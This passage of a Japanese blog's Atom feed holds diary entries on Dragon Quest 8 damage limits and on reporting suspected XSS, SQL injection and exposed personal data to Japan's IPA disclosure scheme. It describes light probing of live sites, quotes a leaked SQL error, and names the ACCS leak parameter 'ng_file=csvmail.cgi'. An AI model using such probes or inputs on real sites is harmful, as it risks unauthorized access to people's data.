href="../genre/%E3%83%89%E3%83%A9%E3%82%AF%E3%82%A88">ドラクエ8</a> / <a href="../genre/%E3%83%89%E3%83%A9%E3%82%AF%E3%82%A8">ドラクエ</a></span></p></div></div></content></entry><entry><title>ドラクエ8の最大ダメージ</title><link href="http://bakera.jp/ebi/topic/2121" /><id>tag:bakera.jp,2008:/ebi/topic/2121</id><updated>2005-01-22T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/1/2">2005年1月2日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/2121">ドラクエ8の最大ダメージ</a></h2><p class="subinfo"><span class="updated">更新: 2005年1月22日</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B00062ILP8&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ドラクエ8</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B00062ILP8" alt="" width="1" height="1" /></span>で最大のダメージを叩き出す攻撃は何かと問われたとき、「マダンテ」を思い浮かべる人は多いと思います。威力は MP に比例し、レベル99 になれば溜めない状態でも軽く 1000 を超えるダメージ。テンションを溜めて放てばさぞ強力だろう……と思いきや、実はどう頑張っても 5008 ダメージしか出ません。</p><p>どうも呪文にはそれぞれにダメージの上限が定められていて、マダンテの場合はそれが 5008 に設定されているようです。ギガブレイクなどの攻撃力に依存しない特技も同様で、値は異なるものの、それぞれに上限があります。そして、それらは全てマダンテより低い値になっています。</p><p>というわけで、一発の最大ダメージは 5008……と思いきや、実は攻撃力に依存する技ではもっとダメージを与えられたりするのです。たとえば「ドラゴン斬り」がそうで、力が 400 の主人公が「ドラゴンスレイヤー」と「ごうけつのうでわ」を装備してスーパーハイテンション状態になり、バイキルトをかけられた状態でドラゴンに対して放つと、ダメージは軽く 9000 を超えます。</p><p>と、ここまではかなり早い段階で分かっていたのですが、そうなると、ドラゴン斬りでどこまでのダメージを出せるのかが気になってきます。というわけで、延々とミミック狩りで「ちからのたね」を集め、主人公の攻撃力を上げてみました。</p><p>その結果、上限値が判明。</p><div class="figure"><img src="../img/9999" alt="9999ダメージが上限です。" width="250" height="150" /></div><p>まあ今回のドラクエではダメージの表示形式が FF 方式ですので、この上限は予想していました。おそらく、他のどんな技でもダメージがこの値を上回ることはないでしょう。</p><p>このことから、「1ターン最大ダメージ」の理論最高値も分かります。HP が最も高い敵に対してまず最大HP-1 のダメージを与え、9999ダメージでとどめを刺した場合が最大になるはずです。狂った竜神王の HP が 8300 らしいので、「1ターン最大ダメージ」の最大値は 18298 となるものと思われます。</p><p class="note">※2005-01-11追記: よく考えたら、敵が回復すればもっと行く可能性がありますね。メガザルを使う敵と一緒に出てくる奴で狙ってみるとか……。</p><p class="note">※2005-01-22追記: 最大ダメージは 9999 を超えることが分かりました。<a href="../topic/2146">9999 OVER</a>参照のこと。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/2121/comment">「ドラクエ8の最大ダメージ」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%83%89%E3%83%A9%E3%82%AF%E3%82%A88">ドラクエ8</a> / <a href="../genre/%E3%83%89%E3%83%A9%E3%82%AF%E3%82%A8">ドラクエ</a></span></p></div></div></content></entry><entry><title>疑惑レベルで届出OK</title><link href="http://bakera.jp/ebi/topic/2017" /><id>tag:bakera.jp,2008:/ebi/topic/2017</id><updated>2004-11-04T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/10/20">2004年10月20日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/2017">疑惑レベルで届出OK</a></h2><p class="subinfo"><span class="updated">更新: 2004年11月4日</span></p><p>MYCOM PC WEB にも出ていましたね……「<a href="http://pcweb.mycom.co.jp/news/2004/10/18/002.html">脆弱性届出制度、開始から3カ月 - 92件の届出、13件の修正完了</a> <em class="domain-info">(pcweb.mycom.co.jp)</em>」。こちらは興味深い点が二点ほど。</p><div class="quote-and-cite"><blockquote cite="http://pcweb.mycom.co.jp/news/2004/10/18/002.html"><p>早貸セキュリティセンター長は「"(脆弱性が存在する)可能性があるかもしれない"程度のレベルで届け出てもらってかまわない。あとはIPAが調べる」と述べており、詳細な脆弱性情報を届け出なくてもIPA側では情報を受け付け、検査、ベンダーとの調整が行われることを強調した。</p></blockquote><p class="cite">以上、<a href="http://pcweb.mycom.co.jp/news/2004/10/18/002.html">脆弱性届出制度、開始から3カ月 - 92件の届出、13件の修正完了</a> より</p></div><p>まあ私も SQL のエラーメッセージを見ただけで「SQLインジェクションの疑いあり」とか言って届けちゃってるんですが、それで OK みたいですね。それでもさすがに「input type="hidden" にファイル名っぽいパラメータがある」というだけで届け出るのは抵抗があったのですが、そんなのでも届け出ちゃって良いということかしら。</p><p class="note">※軽い疑惑のレベルで届けたりすると IPA 側がパンクするのではないかと懸念していましたが、現状の届出件数を見る限りではパンクしそうにないですね。:-)</p><div class="quote-and-cite"><blockquote cite="http://pcweb.mycom.co.jp/news/2004/10/18/002.html"><p>ちなみに届け出られた脆弱性情報は現在92件だが、脆弱性を届け出た人は22人となっており、一人で複数の脆弱性を届け出ている例が多かったという</p></blockquote><p class="cite">以上、<a href="http://pcweb.mycom.co.jp/news/2004/10/18/002.html">脆弱性届出制度、開始から3カ月 - 92件の届出、13件の修正完了</a> より</p></div><p>22人というのはまたえらく少ないですね。</p><p>office さんの逮捕は、思ったよりもずっと悪い影響を及ぼしているのかもしれません。</p><p class="note">※2004-11-04 追記: 「input type="hidden" にファイル名っぽいパラメータがある」というだけのものを一件届け出てみたのですが、受理され、取り扱われ、そして<em>修正されました</em>。</p><ul class="comment-link"><li><a href="../topic/2017/comment">「疑惑レベルで届出OK」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a> / <a href="../genre/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3">SQLインジェクション</a></span></p></div></div></content></entry><entry><title>脆弱性届出話</title><link href="http://bakera.jp/ebi/topic/1984" /><id>tag:bakera.jp,2008:/ebi/topic/1984</id><updated>2004-11-04T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/9/13">2004年9月13日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/1984">脆弱性届出話</a></h2><p class="subinfo"><span class="updated">更新: 2004年11月4日</span></p><p>「<a href="http://internet.watch.impress.co.jp/cda/event/2004/09/10/4588.html">脆弱性情報届出制度は運用しながら改善を～パネルディスカッション</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>」という話ですが、</p><div class="quote-and-cite"><blockquote cite="http://internet.watch.impress.co.jp/cda/event/2004/09/10/4588.html"><p>9月8日時点でのユーザーからの届出件数は、ソフトウェア製品15件、Webアプリケーション71件の計86件に上っており、うちソフトウェア製品1件（ウイルスバスター・コーポレートエディション）、Webアプリケーション5件について脆弱性の修正が完了したとのこと。</p></blockquote><p class="cite">以上、<a href="http://internet.watch.impress.co.jp/cda/event/2004/09/10/4588.html">脆弱性情報届出制度は運用しながら改善を～パネルディスカッション</a> より</p></div><p><a href="../topic/1373">前に報道されていた話</a>と比較すると、</p><ul><li>件数が増えた</li><li>「個人情報漏洩に繋がる脆弱性は届け出られていない」という話が消えた(!)</li></ul><p>というところでしょうか。後者はたまたま今回は言っていないだけという可能性もありますが、何となくそうではない気がします。</p><p>当然というか問題点がいろいろ出ているようで、</p><div class="quote-and-cite"><blockquote cite="http://internet.watch.impress.co.jp/cda/event/2004/09/10/4588.html"><p>そして、実際に制度を運用してみての感想として、早貸氏は「Webアプリケーションの場合、同一プログラムを複数のサイトで利用しているケースも少なくなく、そういったケースでは1つ脆弱性が見つかると、利用しているサイトの数だけ届出が来てしまう」「Webサイトに連絡先メールアドレスが書かれていても、管理者がそのアドレス宛のメールを読んでいないケースが多く、その場合は連絡先の電話番号などをいちいち調べなければならず面倒」などといった問題が出ていると語った。</p></blockquote><p class="cite">以上、<a href="http://internet.watch.impress.co.jp/cda/event/2004/09/10/4588.html">脆弱性情報届出制度は運用しながら改善を～パネルディスカッション</a> より</p></div><p>まあ前者は「頑張ってください」というより他ないですね。端から見て何が届け出られているのか分からないので、どうしようもありません。ひょっとすると、某サーバ屋のアレなんかみんなして届け出ていたりするのかもしれない……と思ったりするわけですが、だからといって「きっと届け出られているだろうから良いだろう」というのも外れているかもしれないわけで。届出の情報が公開されない限り、重複は回避できないでしょう。</p><p>それから後者、これ、悲しいことにホントに連絡が取れない場合というのが実際にあるようですね。その場合は</p><div class="quote-and-cite"><blockquote><p>本件、以下の理由により取扱いを終了することになりましたので、ご連絡いたします。</p><p>理由:</p><p>ウェブサイト運営者と連絡を取るために、当該サイトの脆弱性関連情報通知先に連絡をしましたが、期限内に返信がなかったため、ウェブサイト運営者と連絡が取れないものと判断しました。</p></blockquote></div><p>……ということになるのですが、そうなったときに発見者はどうすれば良いのかというのが気になるところです。</p><p>密かに修正ということはもう期待できませんので、放置なのか、公開なのかの二択になると思いますが……当然、発見者は放置したくないから届け出ているわけでして……情報を公開したほうが良いものかどうか悩みます。</p><div class="quote-and-cite"><blockquote cite="http://internet.watch.impress.co.jp/cda/event/2004/09/10/4588.html"><p>ただし、未解決の課題として、高木氏は「ベンダーによる脆弱性情報の告知方法のガイドラインができておらず、依然としていわゆる『ヤミ改修』のような行為が行なわれる危険性は減っていない」「脆弱性情報の発見者が情報を公開する場合のガイドラインがないため、同じような欠陥を防ぐために必要なフルディスクロージャーをいつになったら行なっていいのかがわからない」「そもそも『不正アクセス行為に当たらない脆弱性の発見方法』が明確化されておらず、どこまでの行為が許されるのかがわからない」といった問題を列挙した。</p></blockquote><p class="cite">以上、<a href="http://internet.watch.impress.co.jp/cda/event/2004/09/10/4588.html">脆弱性情報届出制度は運用しながら改善を～パネルディスカッション</a> より</p></div><p>これは激しく同意で、私も一番気になっているところです。高木さんは流石に発見者の気持ちが良く分かっていらっしゃるようで。</p><p>しかし少なくとも最初の項目については、ガイドラインで「個人情報漏洩の時は情報を公開する必要がある」としているわけです。逆に言えば、それ以外の時は公開しなくて良いということですから、むしろ制度として「個人情報が漏洩していない場合はヤミ改修で良い」と認めているものだと理解していました。</p><p>もっとも、脆弱性によって個人情報が漏洩したかどうかというのは非常に微妙な部分があります。たとえば <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> などはセッション Cookie が盗まれてセッションハイジャックが行われる可能性があり、ログインによって個人情報が閲覧できるなら、個人情報漏洩の可能性もあるはずなのです。しかし実際にはロクな調査もしないで、「XSS がありましたが実害なし」などという判断をして終了ということになるケースがほとんどです。XSS が発覚しても、「この XSS は Cookie を使ってログインするサーバとは別のサーバのものなので、セッションハイジャックのおそれはありません」などと言ってもらえれば、それはそれで安心できると思うのですが……。</p><p class="note">※そう言ってもらえない場合というのは、漏洩の可能性が否定できない = 情報公開しようねということになるはず。</p><p>ちなみに、届け出られて修正された脆弱性が 5件あるということですが、そのうちの 1件は某 ISP (ニフティではありません) の検索フォームの <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> です。これも全く情報公開された形跡がないですね。</p><p>あと、面白いと思ったのは<a href="http://internet.watch.impress.co.jp/cda/parts/image_for_link/8125-4588-3-1.html">脆弱性情報の届出状況のグラフ</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>。所々にぼこっと大きな山ができているのは、「貯めていたものを一気に吐き出した」人がいるからなのかなぁと思ったり。手持ちの脆弱性がたくさんある場合は、まとめて一度に送るでしょうからね。</p><p class="note">※2004-11-04 追記:「某サーバ屋のアレ」は届け出てみたところ、普通に取り扱われて普通に修正の連絡を受けました。つまり、私以外の誰も届け出ていなかったものと思われ……「誰かが届け出ているだろう」という発想はしちゃ駄目みたいです。</p><ul class="comment-link"><li><a href="../topic/1984/comment">「脆弱性届出話」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>ヨセフアンドレオン</title><link href="http://bakera.jp/ebi/topic/1108" /><id>tag:bakera.jp,2008:/ebi/topic/1108</id><updated>2004-10-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/2/5">2004年2月5日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/1108">ヨセフアンドレオン</a></h2><p class="subinfo"><span class="updated">更新: 2004年10月20日</span></p><p>なんだこりゃ。……「<a href="http://www.josephandleon.co.jp/seimei.html">声明 officeこと、河合一穂の逮捕にあたって</a> <em class="domain-info">(www.josephandleon.co.jp)</em>」</p><p class="note">※追記: 声明文消滅しちゃいましたね。ACCS から何か言われたのでしょうか。</p><p class="note">※2004-10-20 さらに追記: 声明文はいつのまにやら復活しています。どういう意図なんだか良く分かりませんが。</p><p>色々な意味で凄い文章だと思いますが、ともかく、このヨセフアンドレオンという会社が ASK ACCS の運営をしていたようですね。office さんの謝罪文には「ACCS、ファーストサーバ、JPCERT/CC ともう一件の会社に報告した」というような話が出ていましたが、伏せられていた「もう一件の会社」というのがこの会社だったのでしょう。</p><p>まあしかし、ACCS がこのような会社にサイトの運営を依頼していたこと自体が驚きです。事故調査委員会報告書の最後には、</p><div class="quote-and-cite"><blockquote cite="http://www.askaccs.ne.jp/houkoku3.html"><p>具体的には、ACCS内部におけるセキュリティ体制の強化、外部の第三者によるホームページのセキュリティチェック等の実施、<em>ホームページの製作・運営等を外部に委託する際の基準の策定</em>、<em>委託先の再検討</em>、取得すべき個人情報の再検討などを行うべきである。</p></blockquote><p class="cite">以上、ASKACCS個人情報流出事故調査委員会の<a href="http://www.askaccs.ne.jp/houkoku3.html">調査報告書</a> より</p><p class="citenote">※引用文中の強調は引用者による</p></div><p>とあって、これはもう「今の運営会社はやめた方が良い」と言っちゃっているに等しいわけですが、無理もないと思いました。</p><ul class="comment-link"><li><a href="../topic/1108/comment">「ヨセフアンドレオン」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/ACCS">ACCS</a> / <a href="../genre/ASK%20ACCS%20%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9%E4%BA%8B%E4%BB%B6">ASK ACCS 個人情報漏洩事件</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9">情報漏洩</a> / <a href="../genre/%E3%83%95%E3%82%A1%E3%83%BC%E3%82%B9%E3%83%88%E3%82%B5%E3%83%BC%E3%83%90">ファーストサーバ</a></span></p></div></div></content></entry><entry><title>丸見え系</title><link href="http://bakera.jp/ebi/topic/1290" /><id>tag:bakera.jp,2008:/ebi/topic/1290</id><updated>2004-10-18T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/5/18">2004年5月18日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/1290">丸見え系</a></h2><p class="subinfo"><span class="updated">更新: 2004年10月18日</span></p><p>とあるサイトで、フォームから送信されたと思われるデータが公開されていることを発見。普通に考えると設定ミスによる漏洩なのでしょうが、なんかデータに対してリンクが張られているし……アンケート結果を公開するような感覚で意図的に公開しているのかしら? 良く分かりませんが、データには思いっきりメールアドレスなどが含まれていて、問題があるように思えます。</p><p>とりあえずストックに追加しておきますが、IPA の例の窓口はこんなの受け付けてくれるのでしょうか? <a href="http://www.meti.go.jp/feedback/data/i40430cj.html">「ソフトウエア等脆弱性関連情報取扱基準（案）」等に対する意見の募集</a> <em class="domain-info">(www.meti.go.jp)</em>で公開されている PDF 文書を見ると、適用範囲は以下のようになっていますね。</p><div class="quote-and-cite"><blockquote><p>Ⅳ．本基準の適用範囲</p><p>本基準は、以下に掲げるものの脆弱性であって、その脆弱性に起因する被害が不特定多数の者に影響を及ぼし得るものに適用する。</p><p>１．日本国内で利用されているソフトウエア製品 （ソフトウエア製品において通信プロトコル等の仕様を実装した部分を含む。）</p><p>２．主に日本国内からのアクセスが想定されているウェブサイトで稼働するウェブアプリケーション</p></blockquote><p class="cite">以上、ソフトウエア等脆弱性関連情報取扱基準（案） より</p></div><p>ウェブサイトの問題全般を受け受けるわけではなく、ウェブアプリケーションの問題である必要があるように読めます。ウェブアプリケーションの定義は以下の通り。</p><div class="quote-and-cite"><blockquote><p>5．ウェブアプリケーション インターネット上のウェブサイトで稼働する固有のシステム。</p></blockquote><p class="cite">以上、ソフトウエア等脆弱性関連情報取扱基準（案） より</p></div><p>……Web サーバは固有のシステムではないように思えますので、その設定ミスなんてのは対象外のような気がします。</p><p>まあとりあえず通報してみて、「脆弱性関連情報に該当しない」という回答になったら公開という方向で。</p><p class="note">※「脆弱性関連情報に該当しない」となった場合、その情報の公開を妨げる要素って何もないですよね。<a href="http://www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku42.htm">警視庁の「個人情報流出防止」</a> <em class="domain-info">(www.keishicho.metro.tokyo.jp)</em>を見ても、ディレクトリ丸見え系は不正アクセスではないという認識のようですし。</p><p class="note">※2004-10-18 追記: IPA に届け出たらちゃんと受け付けてもらえまして、2004-10-06 に修正完了の連絡をいただきました。</p><ul class="comment-link"><li><a href="../topic/1290/comment">「丸見え系」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a></span></p></div></div></content></entry><entry><title>ストック減少……しかし</title><link href="http://bakera.jp/ebi/topic/1306" /><id>tag:bakera.jp,2008:/ebi/topic/1306</id><updated>2004-10-18T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/5/28">2004年5月28日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/1306">ストック減少……しかし</a></h2><p class="subinfo"><span class="updated">更新: 2004年10月18日</span></p><p>手元の「ストック」には「個人情報を含むデータが公開されてしまっている」というネタが何件かあるのですが、とある方の日記を読んでいたところ、その一つであるところのドメインについての話題が出ていました。</p><p>そこで思い出してアクセスしてみたところ、幸いにもデータは見えなくなっているようです。というわけでストック一つ消滅なのですが、こういう解決の仕方だと、被害者は一生被害にあったことに気づかないのではないかと思います。</p><p>今はもうそのデータは丸見えではないのですから、「かつて丸見えだった」ということを公表してしまっても、それによって被害が拡大するおそれはありません。公開してしまった方が良いのかなとも思うのですが、いろいろ面倒なことが起きそうな気もしますし……。</p><p>こういうケースってどう処理すれば良いのでしょうね。</p><p class="note">※あと、公表はされてるんだけど過少申告されているケースとか……。</p><p class="note">※2004-10-18 追記: 「かつて丸見えだった」所には別途「現在も丸見え」なものがあったので IPA に届け出ましたが、管理者と連絡が付かないということで取扱い終了になってしまいました。また、「公表はされてるんだけど過少申告されているケース」もいちおう届け出てみましたが、こちらは脆弱性関連情報に当たらないとのことでした。</p><ul class="comment-link"><li><a href="../topic/1306/comment">「ストック減少……しかし」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1">個人情報</a></span></p></div></div></content></entry><entry><title>えび日記のコメント</title><link href="http://bakera.jp/ebi/topic/420" /><id>tag:bakera.jp,2008:/ebi/topic/420</id><updated>2004-10-18T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/2/24">2003年2月24日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/420">えび日記のコメント</a></h2><p class="subinfo"><span class="updated">更新: 2004年10月18日</span></p><p><a href="http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/02.html#20030224_seibu">セキュリティホール memo に西武百貨店の話題</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>。思いっきり思い出したことがあるのですが、ヤバすぎて書けない……。<em class="note">※確認したら、未だに修正されていませんでしたので。</em></p><p>新しいえび日記で一つ便利になったのは、本当にまずいようなことでもソース内にコメントとして書いておけること。何でもソース内にメモしてしまう習慣は昔からありましたが、コメントは私以外にも読めてしまうので、本当に書いてはまずいことは書けなかったのでした。しかし新しいえび日記では、ソースの XML に書かれているコメントは出力されないので、何でも心おきなくメモしておけるのです。</p><p class="note">※でもサーバ管理者の強権を使われると読めてしまう……。</p><p class="note">※2004-10-18 追記: ヤバイ件は IPA に届け出たところ、2004-09-28 に修正の連絡をいただきました。</p><ul class="comment-link"><li><a href="../topic/420/comment">「えび日記のコメント」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a> / <a href="../genre/%E3%81%88%E3%81%B3%E6%97%A5%E8%A8%98">えび日記</a></span></p></div></div></content></entry><entry><title>リピーター?</title><link href="http://bakera.jp/ebi/topic/1062" /><id>tag:bakera.jp,2008:/ebi/topic/1062</id><updated>2004-10-18T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/1/15">2004年1月15日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/1062">リピーター?</a></h2><p class="subinfo"><span class="updated">更新: 2004年10月18日</span></p><p>3年ほど前のことなのですが、あるサイトで、ふと検索フォームに <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> を発見しました。ついでに色々調べたら、cgi-bin 以下が丸見えであることが判明。しかも、そこには見事に個人情報を含む CSV ファイル (たぶんアンケートのデータ) が置かれていて、ダウンロードできてしまう状態でした。</p><p>XSS の方はめんどくさかったので放置しておきましたが、個人情報丸見えは流石に教えた方が良いだろうということでこっそりと報告。その結果……全く何の音沙汰もなく、一週間くらいしてみたら cgi-bin 以下は見えないようにされていました。</p><p>で先日、偶然にもそのサイトにふたたび遭遇。3年経っても XSS が直っていない事を確認しました。</p><p>それはそれで問題ないのですが (ないのか?)、そのサイトのとある場所にログインフォームがあったので、何も入れないで submit ボタンを押してみました。</p><p class="note">※ちなみに、私にはフォームを見かけるととりあえず何も入れずに submit してみる習性があります。そうしないと<a href="../topic/247">かなり強力に残念な思いをする</a>ことがあるので……。</p><p>そうしたら、こういうエラーメッセージが出てしまったのですよね。</p><div class="sample"><pre>
Warning: PostgreSQL query failed: ERROR: parser: parse error at or near "and" in /home/homepage/public_html/service/system/index.php on line 87

Warning: Supplied argument is not a valid PostgreSQL result resource in /home/homepage/public_html/service/system/index.php on line 88
</pre></div><p>なんだかとっても嫌な予感がするのですが、突っ込んで検証しようとした瞬間に「不正アクセス禁止法」(不正アクセス行為の禁止等に関する法律) に抵触するような気がしたので、すんなりと忘れることにしました。</p><p>医療ミスを繰り返す医者のことを「リピーター医師」と言うそうですが……。</p><p class="note">※2004-10-18 追記: IPA に届け出てみたら 2004-09-21 に修正完了の連絡をいただきました (XSS, <dfn class="glossary"><a href="../../glossary/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3">SQLインジェクション</a></dfn>共に修正完了の旨)。SQLインジェクションが可能かどうかは確認しないで届け出たのですが、ホントに SQL インジェクションできちゃっていたみたいです。ともあれ修正されましたので一安心。</p><ul class="comment-link"><li><a href="../topic/1062/comment">「リピーター?」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1">個人情報</a> / <a href="../genre/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3">SQLインジェクション</a></span></p></div></div></content></entry><entry><title>SQL 系</title><link href="http://bakera.jp/ebi/topic/1356" /><id>tag:bakera.jp,2008:/ebi/topic/1356</id><updated>2004-10-18T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/8/5">2004年8月5日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/1356">SQL 系</a></h2><p class="subinfo"><span class="updated">更新: 2004年10月18日</span></p><p>とあるサイトで、URL の末尾がちょっと欠けたりすると</p><div class="quote-and-cite"><blockquote><p>Database error: Invalid SQL: SELECT num……(以下略)</p></blockquote></div><p>などというエラーが出てしまうのに気づいたり。</p><p>これはちょっとまずそうな予感がするのですけれど、確信を得るためにはいろいろしなくてはならず、しかしながらそれはとても危険なので何とも。やっぱり、この手のものは疑惑段階で届け出てしまうのが良いのかしら。</p><p class="note">※2004-10-18 追記: 届け出ようかと思って念のため再確認したら、いつのまにか修正されていました。というわけで届け出ずに済みました。めでたしめでたし。</p><ul class="comment-link"><li><a href="../topic/1356/comment">「SQL 系」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>不正アクセス禁止法に抵触しない程度の簡単なバックドアって?</title><link href="http://bakera.jp/ebi/topic/1995" /><id>tag:bakera.jp,2008:/ebi/topic/1995</id><updated>2004-10-07T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/9/29">2004年9月29日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/1995">不正アクセス禁止法に抵触しない程度の簡単なバックドアって?</a></h2><p class="subinfo"><span class="updated">更新: 2004年10月7日</span></p><p><a href="http://www.itmedia.co.jp/news/articles/0409/29/news073.html">「ACCSは十字架を背負い続ける」――久保田氏、情報漏えい事件を語る</a> <em class="domain-info">(www.itmedia.co.jp)</em>。</p><div class="quote-and-cite"><blockquote cite="http://www.itmedia.co.jp/news/articles/0409/29/news073.html"><p>500円の金券を配って終わり、という話ではない。ACCSは情報漏えいした方々の十字架を背負い続けるしかない</p></blockquote><p class="cite">以上、<a href="http://www.itmedia.co.jp/news/articles/0409/29/news073.html">「ACCSは十字架を背負い続ける」――久保田氏、情報漏えい事件を語る</a> より</p></div><p>これはあてつけなのかなぁ。いやまあ、全く同感なのですけれども。</p><div class="quote-and-cite"><blockquote cite="http://www.itmedia.co.jp/news/articles/0409/29/news073.html"><p>続いて、ネット情報セキュリティ研究会（NIS）技術調査部長の萩原栄幸氏は、「国内のWebサイトは脆弱すぎる」と指摘する。「ある有名大学のWebサイトに、不正アクセス禁止法に抵触しない程度の簡単なバックドアを仕掛けたところ、大学の教職員名簿がまるごと見えてしまった」（萩原氏）。</p></blockquote><p class="cite">以上、<a href="http://www.itmedia.co.jp/news/articles/0409/29/news073.html">「ACCSは十字架を背負い続ける」――久保田氏、情報漏えい事件を語る</a> より</p></div><p>ええと……「不正アクセス禁止法に抵触しない程度の簡単なバックドア」っていったい何でしょう。バックドアを仕掛けたという言葉が文字通りであるのなら、それが簡単であったかどうかは違法性とは全く関係ないような気がしますけれども。</p><p>逆に、個人的には <dfn class="glossary"><a href="../../glossary/ng_file=csvmail.cgi">ng_file=csvmail.cgi</a></dfn> のほうこそ「不正アクセス禁止法に抵触しない程度の簡単な」アクセスだと思うのですよね。ただの<dfn class="glossary"><a 